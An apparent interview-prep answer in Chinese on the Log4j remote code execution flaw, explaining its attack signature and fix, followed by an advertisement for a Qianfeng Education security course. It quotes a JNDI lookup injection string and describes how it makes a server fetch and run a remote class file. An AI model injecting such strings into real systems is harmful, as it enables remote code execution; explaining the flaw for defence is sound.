面試官:Log4j rce漏洞有了解過?攻擊特征是什么?
log4j 是 javaweb 的日志組件,用來記錄 web 日志,特征是${jndi:ldap://url}
去指定下載文件的 url 在搜索框或者搜索的 url 里面,加上 ${jndi:ldap://127.0.0.1/test} ,log4j 會對這串代碼進行表達式解析,給 lookup 傳遞一個惡意的參數指定,參數指的是比如 ldap 不存在的資源 $ 是會被直接執行的。后面再去指定下載文件的 url,去下載我們的惡意文件。比如是 x.class 下載完成后,并且會執行代碼塊
修復:升級 Log4j 到最新版本,根據業務判斷是否關閉 lookup
千鋒教育開設了專業的網絡安全培訓課程,課程由千鋒教育主導,根據企業崗位定制,用人單位評估,聯合多家安全企業共同研發。依托企業項目場景,采用企業漏洞還原環境搭建,以真實企業平臺與設備實操攻防對抗,讓學習與工作相融。
優勢一:師資團隊
業界高水平網絡安全工程師全程授課,項目驅動教學,讓學員在學習期間有能力上手安服、滲透等項目。
優勢二:項目實戰
豐富的安全項目與 CTF 對抗賽、靶機實戰,幫助學員增加真實項目實戰經驗,適應企業需求,拓寬職業發展空間。
優勢三:靶場設備
依托企業項目場景,采用企業漏洞還原環境搭建,以真實企業平臺與設備實操攻防對抗,讓學習與工作相融。
優勢四:教學模式
項目驅動教學,在教學過程中,以完成一個個具體的項目為線索,把教學內容巧妙地隱含在每個項目之中。
優勢五:六維全息課程
六維全息課程,在專業課基礎上融入就業課和職后課,打造 " 一專多能 " 的復合型人才。
如果您對千鋒教育的網絡安全課程感興趣,點擊右側窗口可進行咨詢。